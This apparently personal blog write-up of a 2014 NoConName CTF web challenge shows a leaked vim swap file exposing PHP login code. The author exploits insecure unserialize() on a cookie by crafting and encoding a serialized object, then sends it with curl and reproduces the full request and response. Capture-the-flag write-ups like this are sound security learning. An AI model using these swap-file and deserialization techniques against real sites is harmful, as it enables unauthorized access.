pantallazo_ 2014-09-14 a la(s) 11.16.53
This challenge has a a bit more complicated solution proceess and more fun to learn. We have a login page that stay inmmutable to our several injection attacks. The only weird thing is a comment on the source page, vim editor staff.

<!-- vim: set ts=2 sw=2: -->

So this php has been edited with vim? Will be a swap file downloadable? I can’t believe that ! After download it, see its content:

https://ctf.noconname.org/makemefeelweb/.login.php.swp

$ strings login.php.swp
b0VIM 7.4
/ncn/web1/login.php
3210#"!
@$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));
if (isset($_COOKIE['JSESSIONID'])) {
if ($username == "p00p" &amp;&amp; $password == "l!k34b4u5") {
$this->p = $_passwd;
$this->u = $_uname;
public function __construct($_uname, $_passwd) {
public $p;
public $u;
class Creds {

One could think “ok, i got it”. Let’s see what happens when we try to login with that credentials.

username: p00p
password: l!k34b4u5
A doggy puch !
A doggy puch !

After this LoL gif time, we have to analyze why this credentials aren’t totally correct.

First, we have to set a JSESSIONID cookie and see that even with empty value a message appears: “Getting close :)“. So something inside this cookie need to be injected, let’s see detailed the part of the code we have:

-> if (isset($_COOKIE['JSESSIONID'])) { // a message appears 
-> @$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie))))); // unserialize and hex2bin b64 staff of $cookie ? not $:COOKIE['JSESSIONID'] 
-> $this->p = $_passwd;
-> $this->u = $_uname;
-> public function __construct($_uname, $_passwd) { // cons method 
-> public $p;
-> public $u;
-> class Creds { // a class Creds 

What could we do with PHP classes, unserialize and cookies ? Inject something that show us the flag. If the credentials are ok as ‘good try’ we need to know what to put on the JSESSIONID cookie.

First i think that we could do a PHP JSON Object command injection on the cookie, but obviously there was no ‘eval’  in the code, so let’s make our serialized class object:

O:5:"Creds":2:{s:1:"p";s:9:"l!k34b4u5";s:1:"u";s:4:"p00p";}

Object Creds with the two username/password variables inside it. Nothing happens if we try to inject this to the cookie, need to encoded some way:

>>> import base64

>>> base64.b64encode('O:5:"Creds":2:{s:1:"p";s:9:"l!k34b4u5";s:1:"u";s:4:"p00p";}'.encode('hex'))
'NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjczM2EzOTNhMjI2YzIxNmIzMzM0NjIzNDc1MzUyMjNiNzMzYTMxM2EyMjc1MjIzYjczM2EzNDNhMjI3MDMwMzA3MDIyM2I3ZA=='

>>> data='NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjczM2EzOTNhMjI2YzIxNmIzMzM0NjIzNDc1MzUyMjNiNzMzYTMxM2EyMjc1MjIzYjczM2EzNDNhMjI3MDMwMzA3MDIyM2I3ZA=='

>>> base64.b64decode(data)
'4f3a353a224372656473223a323a7b733a313a2270223b733a393a226c216b333462347535223b733a313a2275223b733a343a2270303070223b7d'

>>> hex='4f3a353a224372656473223a323a7b733a313a2270223b733a393a226c216b333462347535223b733a313a2275223b733a343a2270303070223b7d'

>>> hex.decode('hex')
'O:5:"Creds":2:{s:1:"p";s:9:"l!k34b4u5";s:1:"u";s:4:"p00p";}'

Let’s curl with this data and see the flag:

curl -vvv -k 'https://ctf.noconname.org/makemefeelweb/login.php' -H 'Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjczM2EzOTNhMjI2YzIxNmIzMzM0NjIzNDc1MzUyMjNiNzMzYTMxM2EyMjc1MjIzYjczM2EzNDNhMjI3MDMwMzA3MDIyM2I3ZA==; _dashboard_session=amZORFlKSkUzTlN3Y3lFai9uUVVTcHdEMktQVXdVTWo5ckEzcDNjajVLaURYaHBFd0Yrc0Ixc2U3eWFMOGRPd1dVbTBFak8vWnd5OGVNZSt5MHNNNEl6Y0pVekhqTHZYaitaZUo5azBheVRvdVladWdSMEFxaXhqMFluUFAwMmo2bVl3emNQK3NWdjZmZTBKblNLdVFnTVFaUS90bXM2aWh1MDJtck9udzlaVVE4ejFjRnYzeUsxNVRwbHdyazFFbkZoQy9WelhnQUozWnVJaTlMZEhiV0s1WXVPLzNCY20xQzhOck9HeHFzMD0tLWsyZysvS3lJTWNnbDdwY3JwYXhtL3c9PQ%3D%3D--a91ebb3c5d6fa96e16a831a9e965b3004ec24c4b; PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7facf480d000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7facf480d000) send_pipe: 1, recv_pipe: 0
* About to connect() to ctf.noconname.org port 443 (#0)
*   Trying 88.87.208.202...
* Connected to ctf.noconname.org (88.87.208.202) port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: ctf.noconname.org
> GET /makemefeelweb/login.php HTTP/1.1
> User-Agent: curl/7.30.0
> Host: ctf.noconname.org
> Accept: */*
> Cookie: JSESSIONID=&amp;lt;strong&amp;gt;NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjczM2EzOTNhMjI2YzIxNmIzMzM0NjIzNDc1MzUyMjNiNzMzYTMxM2EyMjc1MjIzYjczM2EzNDNhMjI3MDMwMzA3MDIyM2I3ZA==&amp;lt;/strong&amp;gt;; _dashboard_session=amZORFlKSkUzTlN3Y3lFai9uUVVTcHdEMktQVXdVTWo5ckEzcDNjajVLaURYaHBFd0Yrc0Ixc2U3eWFMOGRPd1dVbTBFak8vWnd5OGVNZSt5MHNNNEl6Y0pVekhqTHZYaitaZUo5azBheVRvdVladWdSMEFxaXhqMFluUFAwMmo2bVl3emNQK3NWdjZmZTBKblNLdVFnTVFaUS90bXM2aWh1MDJtck9udzlaVVE4ejFjRnYzeUsxNVRwbHdyazFFbkZoQy9WelhnQUozWnVJaTlMZEhiV0s1WXVPLzNCY20xQzhOck9HeHFzMD0tLWsyZysvS3lJTWNnbDdwY3JwYXhtL3c9PQ%3D%3D--a91ebb3c5d6fa96e16a831a9e965b3004ec24c4b; PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
>
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 09:51:19 GMT
< Content-Type: text/html
< Content-Length: 44
< Connection: keep-alive
< Strict-Transport-Security: max-age=15768000
<
* Connection #0 to host ctf.noconname.org left intact
NcN_778064be6556e64577517875a8710b0abeba1578

flag: NcN_778064be6556e64577517875a8710b0abeba1578

ps: Thanks to my dcua team mates.



Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Conoce cómo se procesan los datos de tus comentarios.